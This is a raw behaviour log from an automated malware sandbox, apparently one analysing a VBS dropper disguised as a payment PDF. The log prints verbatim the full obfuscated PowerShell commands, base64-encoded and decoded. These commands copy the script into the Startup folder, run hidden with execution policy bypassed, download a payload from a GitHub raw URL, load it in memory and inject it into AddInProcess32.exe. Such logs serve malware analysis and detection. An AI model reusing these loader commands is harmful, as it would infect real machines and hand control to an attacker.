                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2280Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2999Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1198Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 557Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4243Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5541Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 962Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 8510Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1772Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep count: 2280 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep count: 2999 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep count: 4243 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep count: 5541 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5364Thread sleep count: 253 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5364Thread sleep time: -126500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1164Thread sleep count: 962 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1164Thread sleep time: -2886000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1164Thread sleep count: 8510 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1164Thread sleep time: -25530000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041A01B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040B28E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040838E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004087A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00407848
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004068CD FindFirstFileW,FindNextFileW,11_2_004068CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0044BA59 FindFirstFileExA,11_2_0044BA59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040AA71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00417AAB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040AC78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00406D28
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: powershell.exe, 00000008.00000002.2367115847.000002006D8B0000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.3435406338.00000000012E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_11-47472
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_004327AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041A8DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004407B5 mov eax, dword ptr fs:[00000030h]11_2_004407B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,11_2_00410763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_004327AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004328FC SetUnhandledExceptionFilter,11_2_004328FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_004398AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00432D5C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 456000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 46E000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 474000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 475000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 476000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47B000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F09008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe11_2_00410B5C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004175E1 mouse_event,11_2_004175E1
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\payment specifikacija 364846637-pdf.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.edadilibisnapxe.vbs')')
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrfbly6y09tu1bly1s0lde1ldi1xs1kt0lojycpkcaoj1nic3vybcankyc9jysnidnks2h0jysndccrj3bzoicrjy8vjysncmenkyd3lmdpdggnkyd1ynvzzscrj3jjb250zw50lmnvbs9ob0qnkydldccrj2vjde9ul05vrgunkyd0zwn0t24vcmvmcy9ozwfkcy9tywlul0rldccrj2fotm90ac1wlicrj3qnkyd4jysnddnksycrjzsgjysnu0hzjysnymfzzty0q29udgunkydudca9iccrjyhozxcttycrj2jqzscrj2n0jysniccrj1mnkyd5c3rljysnbs5ozscrj3quv2viq2xpzw50ks5ebycrj3dubg9hzfn0cmluzyhtshn1cmwnkycpoyankydtshniaw5hcnknkyddb250jysnzw50id0gw1n5c3rlbs5db252zxj0xto6rnjvbscrj0jhjysnc2u2nfn0jysncmluzyhtshmnkydiyxnlnicrjzqnkyddb250zw50ktsnkycgu0hzyxnzzw1ijysnbhkgpsbbuicrj2vmbgvjjysndglvbi5bc3nlbwjsev06oicrj0xvywqou0hzjysnyicrj2luyscrj3j5q29udccrj2vudck7jysniftkbmxpyi5jty5ijysnb21lxto6vkfjkgvxjysnqtavslu0ymyvzc9lzscrjy4nkydldhnhcc8vonnwdhqnkydozvdblcankydljysnv0fkjysnzxnhdgl2ywrvzscrj1dblcblv0fkzxnhdgknkyd2ywqnkydvzvdblcbljysnv0fkzxnhdccrj2l2ywrvzvdblcbljysnv0fbzccrj2rjblbyb2nlc3mzjysnmmvxqswgzscrj1cnkydbzvdblgvxqwunkydxqsknks5yrxbsywnfkchby0hbcl0xmderw2niqxjdodcrw2niqxjdnjuplftzvhjjbmddw2niqxjdmzqplnjfcgxhy0uoj1nicycsw3nuckluz11by0hbcl0znikuckvwbgfjrsgow2niqxjdnterw2niqxjdmtawk1tjsefyxtc1ksxbc1rysw5nxvtjsefyxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $env:comspec[4,15,25]-join'')( ('shsurl '+'='+' 3dkht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/nod'+'et'+'ecton/node'+'tecton/refs/heads/main/det'+'ahnoth-v.'+'t'+'x'+'t3dk'+'; '+'shs'+'base64conte'+'nt = '+'(new-o'+'bje'+'ct'+' '+'s'+'yste'+'m.ne'+'t.webclient).do'+'wnloadstring(shsurl'+'); '+'shsbinary'+'cont'+'ent = [system.convert]::from'+'ba'+'se64st'+'ring(shs'+'base6'+'4'+'content);'+' shsassemb'+'ly = [r'+'eflec'+'tion.assembly]::'+'load(shs'+'b'+'ina'+'rycont'+'ent);'+' [dnlib.io.h'+'ome]::vai(ew'+'a0/ju4bf/d/ee'+'.'+'etsap//:sptt'+'hewa, '+'e'+'wad'+'esativadoe'+'wa, ewadesati'+'vad'+'oewa, e'+'wadesat'+'ivadoewa, e'+'waad'+'dinprocess3'+'2ewa, e'+'w'+'aewa,ewae'+'wa)').replace(([char]101+[char]87+[char]65),[string][char]34).replace('shs',[string][char]36).replace(([char]51+[char]100+[char]75),[string][char]39) )"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\payment specifikacija 364846637-pdf.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.edadilibisnapxe.vbs')')Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrfbly6y09tu1bly1s0lde1ldi1xs1kt0lojycpkcaoj1nic3vybcankyc9jysnidnks2h0jysndccrj3bzoicrjy8vjysncmenkyd3lmdpdggnkyd1ynvzzscrj3jjb250zw50lmnvbs9ob0qnkydldccrj2vjde9ul05vrgunkyd0zwn0t24vcmvmcy9ozwfkcy9tywlul0rldccrj2fotm90ac1wlicrj3qnkyd4jysnddnksycrjzsgjysnu0hzjysnymfzzty0q29udgunkydudca9iccrjyhozxcttycrj2jqzscrj2n0jysniccrj1mnkyd5c3rljysnbs5ozscrj3quv2viq2xpzw50ks5ebycrj3dubg9hzfn0cmluzyhtshn1cmwnkycpoyankydtshniaw5hcnknkyddb250jysnzw50id0gw1n5c3rlbs5db252zxj0xto6rnjvbscrj0jhjysnc2u2nfn0jysncmluzyhtshmnkydiyxnlnicrjzqnkyddb250zw50ktsnkycgu0hzyxnzzw1ijysnbhkgpsbbuicrj2vmbgvjjysndglvbi5bc3nlbwjsev06oicrj0xvywqou0hzjysnyicrj2luyscrj3j5q29udccrj2vudck7jysniftkbmxpyi5jty5ijysnb21lxto6vkfjkgvxjysnqtavslu0ymyvzc9lzscrjy4nkydldhnhcc8vonnwdhqnkydozvdblcankydljysnv0fkjysnzxnhdgl2ywrvzscrj1dblcblv0fkzxnhdgknkyd2ywqnkydvzvdblcbljysnv0fkzxnhdccrj2l2ywrvzvdblcbljysnv0fbzccrj2rjblbyb2nlc3mzjysnmmvxqswgzscrj1cnkydbzvdblgvxqwunkydxqsknks5yrxbsywnfkchby0hbcl0xmderw2niqxjdodcrw2niqxjdnjuplftzvhjjbmddw2niqxjdmzqplnjfcgxhy0uoj1nicycsw3nuckluz11by0hbcl0znikuckvwbgfjrsgow2niqxjdnterw2niqxjdmtawk1tjsefyxtc1ksxbc1rysw5nxvtjsefyxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $env:comspec[4,15,25]-join'')( ('shsurl '+'='+' 3dkht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/nod'+'et'+'ecton/node'+'tecton/refs/heads/main/det'+'ahnoth-v.'+'t'+'x'+'t3dk'+'; '+'shs'+'base64conte'+'nt = '+'(new-o'+'bje'+'ct'+' '+'s'+'yste'+'m.ne'+'t.webclient).do'+'wnloadstring(shsurl'+'); '+'shsbinary'+'cont'+'ent = [system.convert]::from'+'ba'+'se64st'+'ring(shs'+'base6'+'4'+'content);'+' shsassemb'+'ly = [r'+'eflec'+'tion.assembly]::'+'load(shs'+'b'+'ina'+'rycont'+'ent);'+' [dnlib.io.h'+'ome]::vai(ew'+'a0/ju4bf/d/ee'+'.'+'etsap//:sptt'+'hewa, '+'e'+'wad'+'esativadoe'+'wa, ewadesati'+'vad'+'oewa, e'+'wadesat'+'ivadoewa, e'+'waad'+'dinprocess3'+'2ewa, e'+'w'+'aewa,ewae'+'wa)').replace(([char]101+[char]87+[char]65),[string][char]34).replace('shs',[string][char]36).replace(([char]51+[char]100+[char]75),[string][char]39) )"Jump to behavior
                Source: AddInProcess32.exe, 0000000B.00000002.3435406338.00000000012E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager#
                Source: AddInProcess32.exe, 0000000B.00000002.3435406338.00000000012E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWY\
                Source: AddInProcess32.exe, 0000000B.00000002.3435406338.00000000012E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWY\/
                Source: AddInProcess32.exe, 0000000B.00000002.3435406338.00000000012E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWY\$
                Source: AddInProcess32.exe, 0000000B.00000002.3435406338.00000000012E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWY\890
                Source: AddInProcess32.exe, 0000000B.00000002.3435406338.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [Program Manager]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004329DA cpuid 11_2_004329DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,11_2_0044F17B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,11_2_0044F130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,11_2_0044F216
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_0044F2A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,11_2_0040E2BB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,11_2_0044F4F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_0044F61C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,11_2_0044F723
